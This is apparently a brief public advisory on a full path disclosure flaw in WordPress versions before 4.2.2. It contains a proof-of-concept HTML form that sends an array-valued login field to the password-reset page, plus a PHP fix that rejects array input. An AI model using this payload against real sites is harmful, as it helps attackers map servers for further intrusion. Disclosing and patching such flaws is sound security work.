facebook facebook twitter rss

WordPress < 4.2.2 - Full Path Disclosure

Author: Abk Khan , Published: 03-06-2015
# Exploit Title: WordPress < 4.2.2 - Full Path Disclosure
# Date: 03-06-2015
# Software Link: https://wordpress.org/
# Exploit Author: Abk Khan (AnonGuy)
# Contact: http://twitter.com/iAbkKhan
# Tested on: Windows/Linux
# Category: webapps

1. Description ~
A remote user can determine the full path to the web root directory.

2. Proof of Concept ~
<form method="POST" action="http://localhost/wp-login.php?action=lostpassword">
<input type="text" name="user_login[]" value="AnonGuy" />
<input type="hidden" name="redirect_to" />
<br><input type="submit" name="submit" value="Get New Password" />
</form>

3. Solution ~
Add an if statement:
if (is_array($_POST['user_login'])) { echo "Username/Email can't be an array"; }

# Greets to Team MaDLeeTs ~ http://leets.pro

Like us on Facebook :